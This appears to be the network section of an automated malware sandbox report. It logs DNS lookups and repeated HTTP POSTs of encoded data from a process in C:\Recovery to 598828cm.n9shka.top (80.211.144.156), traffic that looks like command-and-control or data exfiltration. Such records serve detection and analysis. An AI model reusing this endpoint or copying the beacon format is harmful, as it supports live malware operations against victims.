                                                    Sep 14, 2024 12:54:37.308120012 CEST806286580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:37.650106907 CEST6286580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:37.655168056 CEST806286580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:37.989903927 CEST806286580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:38.040746927 CEST6286580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:38.124530077 CEST806286580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:38.181257010 CEST6286580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:38.269315958 CEST6286580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:38.270288944 CEST6286680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:38.274852037 CEST806286580.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:38.275983095 CEST806286680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:38.276055098 CEST6286580192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:38.276087046 CEST6286680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:38.276174068 CEST6286680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:38.280981064 CEST806286680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:38.634526968 CEST6286680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:38.639425039 CEST806286680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:38.939486980 CEST806286680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:38.993767023 CEST6286680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:39.068399906 CEST806286680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:39.118839025 CEST6286680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:39.203093052 CEST6286680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:39.203644037 CEST6286780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:39.208230019 CEST806286680.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:39.208288908 CEST6286680192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:39.208420038 CEST806286780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:39.208605051 CEST6286780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:39.208765030 CEST6286780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:39.213644028 CEST806286780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:39.556346893 CEST6286780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:39.561326027 CEST806286780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:39.981513023 CEST806286780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:40.025188923 CEST6286780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:40.028269053 CEST806286780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:40.071928024 CEST6286780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:40.148134947 CEST6286780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:40.148597956 CEST6286880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:40.153232098 CEST806286780.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:40.153474092 CEST806286880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:40.153572083 CEST6286780192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:40.153604031 CEST6286880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:40.153672934 CEST6286880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:40.158512115 CEST806286880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:40.509540081 CEST6286880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:40.514619112 CEST806286880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:40.744879007 CEST6286980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:40.745017052 CEST6286880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:40.749849081 CEST806286980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:40.750068903 CEST806286880.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:40.750155926 CEST6286880192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:40.750325918 CEST6286980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:40.750325918 CEST6286980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:40.755136013 CEST806286980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:40.884404898 CEST6287080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:40.889384031 CEST806287080.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:40.891247988 CEST6287080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:40.891339064 CEST6287080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:40.896172047 CEST806287080.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:41.103218079 CEST6286980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:41.108163118 CEST806286980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:41.108186007 CEST806286980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:41.243894100 CEST6287080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:41.248909950 CEST806287080.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:41.416115999 CEST806286980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:41.462505102 CEST6286980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:41.544501066 CEST806286980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:41.555797100 CEST806287080.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:41.587517023 CEST6286980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:41.603135109 CEST6287080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:41.688481092 CEST806287080.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:41.743891001 CEST6287080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:41.803246021 CEST6286980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:41.803246021 CEST6287080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:41.803714991 CEST6287180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:41.808465958 CEST806286980.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:41.808526993 CEST6286980192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:41.808614969 CEST806287180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:41.808692932 CEST6287180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:41.808743000 CEST806287080.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:41.808798075 CEST6287080192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:41.808880091 CEST6287180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:41.813723087 CEST806287180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:42.165795088 CEST6287180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:42.170701027 CEST806287180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:42.482866049 CEST806287180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:42.525068998 CEST6287180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:42.618242025 CEST806287180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:42.665656090 CEST6287180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:42.746642113 CEST6287180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:42.747143984 CEST6287280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:42.752063036 CEST806287280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:42.752209902 CEST6287280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:42.752259970 CEST806287180.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:42.752290964 CEST6287280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:42.752317905 CEST6287180192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:42.757067919 CEST806287280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:43.103296041 CEST6287280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:43.110903978 CEST806287280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:43.444454908 CEST806287280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:43.493838072 CEST6287280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:43.578006029 CEST806287280.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:43.618793011 CEST6287280192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:43.713263988 CEST6287380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:43.718194008 CEST806287380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:43.718267918 CEST6287380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:43.718357086 CEST6287380192.168.2.480.211.144.156
                                                    Sep 14, 2024 12:54:43.723536015 CEST806287380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:44.391542912 CEST806287380.211.144.156192.168.2.4
                                                    Sep 14, 2024 12:54:44.431333065 CEST6287380192.168.2.480.211.144.156
                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 14, 2024 12:52:03.937227964 CEST6235453192.168.2.41.1.1.1
                                                    Sep 14, 2024 12:52:04.004895926 CEST53623541.1.1.1192.168.2.4
                                                    Sep 14, 2024 12:52:08.043596983 CEST5216753192.168.2.41.1.1.1
                                                    Sep 14, 2024 12:52:08.050538063 CEST53521671.1.1.1192.168.2.4
                                                    Sep 14, 2024 12:52:08.945014954 CEST6030453192.168.2.41.1.1.1
                                                    Sep 14, 2024 12:52:09.010723114 CEST53603041.1.1.1192.168.2.4
                                                    Sep 14, 2024 12:52:11.769407034 CEST5439553192.168.2.41.1.1.1
                                                    Sep 14, 2024 12:52:11.875710964 CEST53543951.1.1.1192.168.2.4
                                                    Sep 14, 2024 12:52:47.893438101 CEST5350980162.159.36.2192.168.2.4
                                                    Sep 14, 2024 12:52:49.297580957 CEST53655201.1.1.1192.168.2.4
                                                    Sep 14, 2024 12:53:03.870498896 CEST5151753192.168.2.41.1.1.1
                                                    Sep 14, 2024 12:53:04.323851109 CEST53515171.1.1.1192.168.2.4
                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Sep 14, 2024 12:52:03.937227964 CEST192.168.2.41.1.1.10x5c4fStandard query (0)getsolara.devA (IP address)IN (0x0001)false
                                                    Sep 14, 2024 12:52:08.043596983 CEST192.168.2.41.1.1.10xafcdStandard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                    Sep 14, 2024 12:52:08.945014954 CEST192.168.2.41.1.1.10x68efStandard query (0)clientsettings.roblox.comA (IP address)IN (0x0001)false
                                                    Sep 14, 2024 12:52:11.769407034 CEST192.168.2.41.1.1.10x1480Standard query (0)www.nodejs.orgA (IP address)IN (0x0001)false
                                                    Sep 14, 2024 12:53:03.870498896 CEST192.168.2.41.1.1.10x99c7Standard query (0)598828cm.n9shka.topA (IP address)IN (0x0001)false
                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Sep 14, 2024 12:52:04.004895926 CEST1.1.1.1192.168.2.40x5c4fNo error (0)getsolara.dev172.67.203.125A (IP address)IN (0x0001)false
                                                    Sep 14, 2024 12:52:04.004895926 CEST1.1.1.1192.168.2.40x5c4fNo error (0)getsolara.dev104.21.93.27A (IP address)IN (0x0001)false
                                                    Sep 14, 2024 12:52:08.050538063 CEST1.1.1.1192.168.2.40xafcdNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                    Sep 14, 2024 12:52:08.050538063 CEST1.1.1.1192.168.2.40xafcdNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                    Sep 14, 2024 12:52:08.050538063 CEST1.1.1.1192.168.2.40xafcdNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                    Sep 14, 2024 12:52:09.010723114 CEST1.1.1.1192.168.2.40x68efNo error (0)clientsettings.roblox.comtitanium.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                    Sep 14, 2024 12:52:09.010723114 CEST1.1.1.1192.168.2.40x68efNo error (0)titanium.roblox.comedge-term4.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                    Sep 14, 2024 12:52:09.010723114 CEST1.1.1.1192.168.2.40x68efNo error (0)edge-term4.roblox.comedge-term4-fra2.roblox.comCNAME (Canonical name)IN (0x0001)false
                                                    Sep 14, 2024 12:52:09.010723114 CEST1.1.1.1192.168.2.40x68efNo error (0)edge-term4-fra2.roblox.com128.116.123.4A (IP address)IN (0x0001)false
                                                    Sep 14, 2024 12:52:11.875710964 CEST1.1.1.1192.168.2.40x1480No error (0)www.nodejs.org104.20.23.46A (IP address)IN (0x0001)false
                                                    Sep 14, 2024 12:52:11.875710964 CEST1.1.1.1192.168.2.40x1480No error (0)www.nodejs.org104.20.22.46A (IP address)IN (0x0001)false
                                                    Sep 14, 2024 12:53:04.323851109 CEST1.1.1.1192.168.2.40x99c7No error (0)598828cm.n9shka.top80.211.144.156A (IP address)IN (0x0001)false
                                                    • getsolara.dev
                                                    • pastebin.com
                                                    • clientsettings.roblox.com
                                                    • www.nodejs.org
                                                    • 598828cm.n9shka.top
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.46276180.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:04.342627048 CEST289OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 344
                                                    Expect: 100-continue
                                                    Connection: Keep-Alive
                                                    Sep 14, 2024 12:53:04.697323084 CEST344OUTData Raw: 00 00 04 07 06 0a 01 07 05 06 02 01 02 01 01 00 00 06 05 0d 02 01 03 01 02 0e 0c 0d 04 04 01 04 0a 0e 07 00 07 02 07 00 0c 03 04 53 00 0b 06 04 03 0a 0c 5b 0d 0f 06 57 07 01 06 51 05 00 06 0e 00 06 0c 01 06 05 04 52 0e 03 0f 0e 0f 0c 0c 54 06 06
                                                    Data Ascii: S[WQRTT\L}Rk`e\`LT]vhOhBf^cR^so[ol]KzcjJ}|`gRO}e~V@xCb~b[
                                                    Sep 14, 2024 12:53:05.144176006 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:05.144197941 CEST1236INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:04 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 1340
                                                    Connection: keep-alive
                                                    Data Raw: 56 4a 7d 5f 7b 7e 7b 00 78 61 60 03 7c 61 7f 07 7d 59 63 0d 6b 59 75 0d 7a 63 6c 42 7d 5c 6f 58 77 5d 65 0c 7a 72 75 00 77 65 7b 59 69 5b 78 01 55 4b 72 52 74 61 63 49 68 5c 57 00 7d 77 75 54 6f 48 7c 42 7d 4d 67 47 62 5b 62 5f 74 07 69 48 7c 61 5b 5b 7d 42 5d 51 6a 67 51 49 62 66 7b 06 7c 5c 5c 5a 7e 63 7d 02 7b 01 6c 01 6f 64 6b 5c 79 6d 70 59 78 62 64 48 7b 05 66 03 7d 63 63 5e 6f 59 64 49 7c 61 6c 5d 77 72 70 01 7a 51 41 5b 6b 64 7c 08 6b 5f 57 40 76 52 70 4f 78 7c 7c 48 77 59 7e 0d 6e 61 53 00 7c 7f 69 5b 78 71 58 04 76 63 63 4a 75 5f 63 5f 74 58 6e 50 7e 5d 79 5f 77 71 7d 05 76 65 52 09 7f 55 75 04 60 6f 7c 04 7f 63 6c 07 6f 6f 70 5a 6c 06 76 03 7c 6e 70 08 74 67 6c 04 7e 62 65 50 7e 53 67 0a 6c 0b 6e 4f 7f 62 58 5c 7b 5d 46 51 68 6c 63 54 69 06 7c 0b 6a 49 54 43 7b 43 51 00 6c 61 77 5b 68 4f 7c 58 7d 49 6c 53 7e 63 79 08 7b 63 55 5e 7d 61 7c 02 63 5d 5b 51 7b 5c 79 4a 75 48 7c 07 7e 58 52 04 7e 48 5b 0c 77 72 73 03 7c 5c 65 01 7f 67 7e 0c 78 76 74 08 7d 5d 51 4a 77 62 5b 4c 77 71 75 48 7c 61 [TRUNCATED]
                                                    Data Ascii: VJ}_{~{xa`|a}YckYuzclB}\oXw]ezruwe{Yi[xUKrRtacIh\W}wuToH|B}MgGb[b_tiH|a[[}B]QjgQIbf{|\\Z~c}{lodk\ympYxbdH{f}cc^oYdI|al]wrpzQA[kd|k_W@vRpOx||HwY~naS|i[xqXvccJu_c_tXnP~]y_wq}veRUu`o|cloopZlv|nptgl~beP~SglnObX\{]FQhlcTi|jITC{CQlaw[hO|X}IlS~cy{cU^}a|c][Q{\yJuH|~XR~H[wrs|\eg~xvt}]QJwb[LwquH|arI}lV}wcu_wxbS}^m{YpCxg|MxSYyLlx]f|Nhxw`}\]vaxI||UY|Oamul`xlhItpn{qWG~BPAzqjv]]DvO|Nt_z`TtLuu[Zlev|tMcRIxlcx^T|mpCtYt~r~O~msxSr~L[}pt|lhN`xO}YPx}gxLpOU}gwA|^WyMZ}rttsa{aaDvv|J}vx}va@wLYILW}gfyfp~sYGwbuAw_mJqf~B|AgUwa{Gzr[J~`[{w^{Y|{SHybRIxMr{]NZ{l~al_vX`I|ogJ{QhqvSw|{]loc[tYrAza~[~z_z\yvxBagx[L~Jx^vtb[vut|B}c|`|c|Ix|{`_Xm`www]~[fzSYQoaeZS[_PrkLQQNSswRRagdEc~{GUrdYWvdTkYvVh\|u|c]jRn_zXvfxjXhO}vmtq|Z[ahgbyet~]ZZuuq\Lr^kbFRpcWQdU[XdHQanJWwqY^Axw`@{m{K{\xK|^@_hoEUtMiZB`{@Wp][}Z{whmW^ooOTAsuXle}\CYie@VrKbZF`Zc[OS]zp]Y\H{bSzGpQN\koEUNo_FjsUcU@R]yNi~cQzP~_|uzY [TRUNCATED]
                                                    Sep 14, 2024 12:53:05.144207954 CEST261INData Raw: 77 50 04 62 59 7b 59 5c 50 60 64 74 51 7f 74 78 5e 62 61 01 41 5b 7d 6e 5e 50 62 06 57 69 0a 0c 08 52 5d 60 4a 5d 60 07 58 57 61 6d 59 7c 5d 72 65 54 5e 55 04 6c 64 68 52 63 0a 60 59 53 71 63 4b 7c 70 0e 5b 7b 71 7f 47 6c 6b 7f 43 6a 04 73 5e 74
                                                    Data Ascii: wPbY{Y\P`dtQtx^baA[}n^PbWiR]`J]`XWamY|]reT^UldhRc`YSqcK|p[{qGlkCjs^tv^ioEP{gVSb_aCQ]Dcce[ikz|\zBqZR_ZwE]bSISX][YfTSVbz`oYx]VZQA[oeEQ~AcUChOPW~ZQneZy\_^{]FQhoOSsIi[AmJET[UAU}dXi`x]yK}Z]YRwB]`THVYYe
                                                    Sep 14, 2024 12:53:05.144213915 CEST261INData Raw: 77 50 04 62 59 7b 59 5c 50 60 64 74 51 7f 74 78 5e 62 61 01 41 5b 7d 6e 5e 50 62 06 57 69 0a 0c 08 52 5d 60 4a 5d 60 07 58 57 61 6d 59 7c 5d 72 65 54 5e 55 04 6c 64 68 52 63 0a 60 59 53 71 63 4b 7c 70 0e 5b 7b 71 7f 47 6c 6b 7f 43 6a 04 73 5e 74
                                                    Data Ascii: wPbY{Y\P`dtQtx^baA[}n^PbWiR]`J]`XWamY|]reT^UldhRc`YSqcK|p[{qGlkCjs^tv^ioEP{gVSb_aCQ]Dcce[ikz|\zBqZR_ZwE]bSISX][YfTSVbz`oYx]VZQA[oeEQ~AcUChOPW~ZQneZy\_^{]FQhoOSsIi[AmJET[UAU}dXi`x]yK}Z]YRwB]`THVYYe
                                                    Sep 14, 2024 12:53:05.226886988 CEST265OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 384
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:53:05.442635059 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:05.442964077 CEST384OUTData Raw: 53 53 59 5d 54 46 5f 58 5e 5e 56 51 56 58 54 5e 57 52 5c 5d 57 5d 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: SSY]TF_X^^VQVXT^WR\]W]U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&(,=3#77*-5?0\0(1*:?%)=70&;<&F/%Z-%
                                                    Sep 14, 2024 12:53:05.729765892 CEST308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:05 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 152
                                                    Connection: keep-alive
                                                    Data Raw: 00 1f 23 5d 29 37 33 03 23 5c 30 53 3c 3f 36 11 2a 0b 36 5f 29 2f 34 06 3e 24 3a 00 3d 13 23 51 27 12 38 18 33 31 0c 01 30 0e 2c 0a 22 2b 2e 5a 0c 1d 23 12 20 0d 2a 59 32 06 04 12 24 1f 25 04 22 21 3b 5f 27 38 2d 13 21 3f 0f 03 28 01 2a 0f 2a 0f 03 54 2a 2e 2e 45 38 5b 2e 50 37 38 23 51 00 10 25 0a 31 3e 39 11 36 19 21 11 3e 0f 07 5c 26 25 26 51 25 28 22 12 25 28 04 04 33 30 3f 11 20 21 23 5c 33 02 05 59 23 1d 0f 51 3c 2e 23 52 2b 0d 28 57 02 3e 5c 4d
                                                    Data Ascii: #])73#\0S<?6*6_)/4>$:=#Q'8310,"+.Z# *Y2$%"!;_'8-!?(**T*..E8[.P78#Q%1>96!>\&%&Q%("%(30? !#\3Y#Q<.#R+(W>\M


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.46276280.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:07.119715929 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1732
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:53:07.478322983 CEST1732OUTData Raw: 56 52 59 5e 54 48 5a 5e 5e 5e 56 51 56 5b 54 58 57 55 5c 5c 57 5c 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VRY^THZ^^^VQV[TXWU\\W\UXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%??6&>)5Q$[(.!6?0(8^%\<(:<15!#2/<&F/%Z-%
                                                    Sep 14, 2024 12:53:07.813839912 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:07.949826002 CEST308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 152
                                                    Connection: keep-alive
                                                    Data Raw: 00 1f 20 00 29 0a 38 58 34 04 23 09 2a 3f 0c 13 2b 32 25 07 2a 2c 05 18 29 27 25 1f 2b 2d 3f 18 26 2c 2b 03 26 31 26 04 30 37 3f 51 22 2b 2e 5a 0c 1d 23 58 20 33 0b 05 25 28 29 02 27 08 2e 5f 23 0c 3f 58 26 3b 0f 5b 21 2f 07 02 3c 01 21 57 3e 32 36 0b 2a 3d 0f 1c 38 5b 2a 56 21 38 23 51 00 10 26 18 32 10 32 03 21 09 1b 1e 29 57 29 59 25 26 35 0d 33 05 35 04 25 38 2e 01 24 20 2f 59 20 32 3b 59 27 12 2c 00 34 30 25 51 2b 3e 23 52 2b 0d 28 57 02 3e 5c 4d
                                                    Data Ascii: )8X4#*?+2%*,)'%+-?&,+&1&07?Q"+.Z#X 3%()'._#?X&;[!/<!W>26*=8[*V!8#Q&22!)W)Y%&535%8.$ /Y 2;Y',40%Q+>#R+(W>\M
                                                    Sep 14, 2024 12:53:08.333759069 CEST308INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 152
                                                    Connection: keep-alive
                                                    Data Raw: 00 1f 20 00 29 0a 38 58 34 04 23 09 2a 3f 0c 13 2b 32 25 07 2a 2c 05 18 29 27 25 1f 2b 2d 3f 18 26 2c 2b 03 26 31 26 04 30 37 3f 51 22 2b 2e 5a 0c 1d 23 58 20 33 0b 05 25 28 29 02 27 08 2e 5f 23 0c 3f 58 26 3b 0f 5b 21 2f 07 02 3c 01 21 57 3e 32 36 0b 2a 3d 0f 1c 38 5b 2a 56 21 38 23 51 00 10 26 18 32 10 32 03 21 09 1b 1e 29 57 29 59 25 26 35 0d 33 05 35 04 25 38 2e 01 24 20 2f 59 20 32 3b 59 27 12 2c 00 34 30 25 51 2b 3e 23 52 2b 0d 28 57 02 3e 5c 4d
                                                    Data Ascii: )8X4#*?+2%*,)'%+-?&,+&1&07?Q"+.Z#X 3%()'._#?X&;[!/<!W>26*=8[*V!8#Q&22!)W)Y%&535%8.$ /Y 2;Y',40%Q+>#R+(W>\M


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    2192.168.2.46276380.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:07.207932949 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
                                                    Sep 14, 2024 12:53:07.556240082 CEST1012OUTData Raw: 56 56 5c 58 54 40 5f 58 5e 5e 56 51 56 5c 54 5b 57 55 5c 5c 57 5d 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50
                                                    Data Ascii: VV\XT@_X^^VQV\T[WU\\W]U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%]*/*0.67>#/Z384Y'*0<&"! =,&F/%Z-
                                                    Sep 14, 2024 12:53:07.883064985 CEST25INHTTP/1.1 100 Continue
                                                    Sep 14, 2024 12:53:08.014039040 CEST158INHTTP/1.1 200 OK
                                                    Server: nginx
                                                    Date: Sat, 14 Sep 2024 10:53:07 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Content-Length: 4
                                                    Connection: keep-alive
                                                    Data Raw: 32 57 5a 50
                                                    Data Ascii: 2WZP


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    3192.168.2.46276680.211.144.156804128C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe
                                                    TimestampBytes transferredDirectionData
                                                    Sep 14, 2024 12:53:08.335813999 CEST266OUTPOST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1
                                                    Content-Type: application/x-www-form-urlencoded
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                    Host: 598828cm.n9shka.top
                                                    Content-Length: 1012
                                                    Expect: 100-continue
